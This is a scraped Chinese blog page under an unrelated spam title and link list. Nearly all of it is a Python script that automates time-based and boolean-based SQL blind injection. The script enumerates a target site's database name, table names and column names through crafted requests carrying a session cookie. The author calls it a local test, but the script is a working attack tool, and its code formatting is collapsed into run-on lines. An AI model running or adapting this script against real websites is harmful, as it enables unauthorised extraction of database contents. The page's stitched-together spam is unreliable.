当前位置: 首页 > news >正文

站酷设计官网茂名东莞网站建设

news 2025/11/3 4:48:26
站酷设计官网,茂名东莞网站建设,js网站开发教程,洛阳做网站那家好python 实现盲注 该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名…

python 实现盲注

该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用.

import requests, time# 时间型盲注
def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名长度 1~19start = time.time()header = {"Cookie": cookie}url = f"{base_url} and if(length(database())={length}, sleep(3.5), 1)"_ = requests.get(url=url, headers=header)end = time.time()resptime = end-startif int(resptime) >= 3:print('数据库长度为:', length)breakelse:print(url)# 布尔型盲注爆列名
def bool_blind(base_url, cookie):chars = "abcdefghijklmnopqrstuvwxyz0123456789_,"session = requests.session()base_url = base_urlheader = {"Cookie": cookie}# 先定义猜对的时候的长度resp = session.get(url=base_url + " and 1=1", headers=header)base_len = len(resp.text)# 先获取数据库长度for db_len in range(1, 20):url = f"{base_url} and length(database())={db_len}"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:breakprint(f"数据库长度:{db_len}")# 根据数据库长度猜名称db_name = ''for i in range(1, db_len+1):for c in chars:url = f"{base_url} and substr(database(), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:db_name += cbreakprint(f"数据库名:{db_name}")# 根据数据库名称猜表名table_name = ''for i in range(1, 40):for c in chars:sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:table_name += cbreakprint(f"数据库中的表名:{table_name}")# 猜所有表的列名table_list = table_name.strip().split(',')for table in table_list:column_name = ''for i in range(100):for c in chars:sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='{table}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:column_name += cbreakprint(f"表{table}的列名:{column_name}")if __name__ == '__main__':url = "http://192.168.112.200/security/read.php?id=1"cookie = "PHPSESSID=b4d659be5e17d948fd8e18078003d3f6"time_blind(base_url=url, cookie=cookie)# bool_blind(base_url=url, cookie=cookie)
http://www.yayakq.cn/news/998549/

相关文章:

  • 厦门城乡建设厅网站格尔木市公司网站建设
  • 中学生免费作文网站东莞电商建站
  • 网站建设+青海wordpress社区功能
  • 热门课程自己做网站云南网站建设
  • 公司建网站软件室内设计模拟app
  • 域名注册哪个网站最便宜网站搭建行业
  • 举报网站建设情况 汇报无锡手机网站制作费用
  • 红河个旧网站建设网页设计作品代码在哪里找
  • 西宁网站建设公司排名wordpress免费模版安装
  • 企业每月报账在哪个网站做快看影视大全官方下载
  • 做网站首页图片网站编辑超链接怎么做
  • 程序员必知的网站龙岗区建设规划网站
  • 番禺网站设计公司南通自助模板建站
  • 网站建设方案意见营销型网站建设公司比较专业
  • 做dnf辅助官方网站拥有自己的网站
  • 网站备案密码通管局如何做网站在售产品分析
  • 单页面的网站模板免费下载网页微信版可以加入腾讯会议吗
  • 找效果图的网站哪个好网站维护做啥的
  • 酷炫给公司网站欣赏建设网站注册会员
  • 企业网站优化做法搭建平台要多少钱
  • 云南公司网站开发知识付费做的最好的平台
  • html5建设摄影网站意义python开源网站源码
  • 网站建设微信营销wordpress 1.0
  • 系统数据库与建设网站中等职业学校网站建设模块
  • 三门峡建设网站网站建设jsp
  • 监控性能网站模板青龙桥网站建设
  • 引流网站建设教程西安响应式网站
  • 技术培训网站seo网络专员招聘
  • qq教程网站源码城市便捷酒店
  • 公司备案的网站被别的公司盗用手机网站定制